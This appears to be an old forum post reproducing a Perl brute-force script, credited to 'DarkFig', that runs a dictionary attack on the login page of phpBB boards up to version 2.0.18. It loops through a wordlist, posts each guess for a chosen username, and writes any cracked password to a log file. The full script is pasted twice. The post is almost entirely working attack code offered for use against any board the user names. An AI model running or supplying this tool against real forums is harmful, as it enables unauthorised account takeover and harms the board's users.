D1mOn
26.01.2006, 16:55
#!/usr/bin/perl
############################################
# Credits: Weakness and Xploit by DarkFig
# Affected products: All PhpBB versions <= 2.0.18
# Type: Dictionnary attack
# Solutions: None official , but many solutions are possible ;)
# Note: If a line of the dictionnary file contain no data => "End of the password file"
# Ps: Public after 1week lol
#Demo: http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html
# Team: Hackademie [] Acid_Root [] BoD []
# PS: Volcom joyeux anniversaire , bon oki je suis en retard...voila ton cadeau ^^
############################################
use IO::Socket;
#--------------Utilisation--------------#
if(@ARGV != 6){
print "
+---------------------------------------------------------------------------------+
+------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
+---------------------------------------------------------------------------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile> +
+---------------------------------------------------------------------------------+
+ <host> => The host where PhpBB is installed | [Ex: site.com] +
+ <path> => Path of the PhpBB board | [Ex: /forum/] +
+ <port> => PhpBB board port | [Default is 80] +
+ <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
+ <username> => Username you want to bruteforce | [Ex: MasterLamer] +
+ <file_result> => File you want to log activity | [Ex: results.txt] +
+---------------------------------------------------------------------------------+
";exit();}
#--------------Data--------------#
$host = $ARGV[0];
$path = $ARGV[1];
$full = "$host"."$path";
$port = $ARGV[2];
$pass_file = $ARGV[3];
$username = $ARGV[4];
$fileresult = $ARGV[5];
$OK = 0;
$referer = "http://"."$host"."$path"."login.php?redirect=";
$postit = "$path"."login.php";
#--------------Hello world-----------------#
print "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Attack log | $fileresult
+---------------------------------------------------------+";
#--------------Password file--------------#
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
$nligne = "0";
while ($OK ne 1) {
$passwordz = "$passdico[$nligne]";
$request = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
$length = length $request;
if ($passwordz eq ""){print "\n [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}
#--------------Sending data--------------#
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
read $send, $answer, 15;
close($send);
#-------------Success---------------#
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
[-] Trying the password "."$passwordz
[+] User: $username
[+] Password: $passwordz
+---------------------------------------------------------+\n";
open results, ">$fileresult";
print results "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] PhpBB board | $full
[+] Board's port | $port
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Number of test | $nligne
[+] Password found | $passwordz
+---------------------------------------------------------+\n";
close(FILE);close(results);exit();}
#-------------Failed-----------------#
if ($OK == 0) {print "\n [-] Trying the password "."$passwordz";$nligne++;}}
############################################
# Credits: Weakness and Xploit by DarkFig
# Affected products: All PhpBB versions <= 2.0.18
# Type: Dictionnary attack
# Solutions: None official , but many solutions are possible ;)
# Note: If a line of the dictionnary file contain no data => "End of the password file"
# Ps: Public after 1week lol
#Demo: http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html
# Team: Hackademie [] Acid_Root [] BoD []
# PS: Volcom joyeux anniversaire , bon oki je suis en retard...voila ton cadeau ^^
############################################
use IO::Socket;
#--------------Utilisation--------------#
if(@ARGV != 6){
print "
+---------------------------------------------------------------------------------+
+------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
+---------------------------------------------------------------------------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile> +
+---------------------------------------------------------------------------------+
+ <host> => The host where PhpBB is installed | [Ex: site.com] +
+ <path> => Path of the PhpBB board | [Ex: /forum/] +
+ <port> => PhpBB board port | [Default is 80] +
+ <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
+ <username> => Username you want to bruteforce | [Ex: MasterLamer] +
+ <file_result> => File you want to log activity | [Ex: results.txt] +
+---------------------------------------------------------------------------------+
";exit();}
#--------------Data--------------#
$host = $ARGV[0];
$path = $ARGV[1];
$full = "$host"."$path";
$port = $ARGV[2];
$pass_file = $ARGV[3];
$username = $ARGV[4];
$fileresult = $ARGV[5];
$OK = 0;
$referer = "http://"."$host"."$path"."login.php?redirect=";
$postit = "$path"."login.php";
#--------------Hello world-----------------#
print "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Attack log | $fileresult
+---------------------------------------------------------+";
#--------------Password file--------------#
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
$nligne = "0";
while ($OK ne 1) {
$passwordz = "$passdico[$nligne]";
$request = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
$length = length $request;
if ($passwordz eq ""){print "\n [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}
#--------------Sending data--------------#
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
read $send, $answer, 15;
close($send);
#-------------Success---------------#
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
[-] Trying the password "."$passwordz
[+] User: $username
[+] Password: $passwordz
+---------------------------------------------------------+\n";
open results, ">$fileresult";
print results "
+---------------------------------------------------------+
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
+---------------------------------------------------------+
[+] PhpBB board | $full
[+] Board's port | $port
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Number of test | $nligne
[+] Password found | $passwordz
+---------------------------------------------------------+\n";
close(FILE);close(results);exit();}
#-------------Failed-----------------#
if ($OK == 0) {print "\n [-] Trying the password "."$passwordz";$nligne++;}}